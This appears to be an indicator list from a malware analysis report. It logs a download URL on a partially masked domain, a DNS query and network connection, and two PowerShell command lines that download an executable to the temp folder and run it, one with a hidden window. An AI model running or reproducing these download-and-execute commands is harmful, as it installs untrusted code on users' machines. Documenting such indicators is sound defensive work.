Technical information
- https://www.co#####ercultura.com.br/adm/cliente/api.exe as %temp%\julios.exe
- 'co#####ercultura.com.br':443
- DNS ASK co#####ercultura.com.br
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('https://www.co#####ercultura.com.br/adm/cliente/api.exe','%temp%\julios.exe'); Start '%temp%\julios.exe'' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('https://www.co#####ercultura.com.br/adm/cliente/api.exe','%temp%\julios.exe'); Start '%temp%\julios.exe'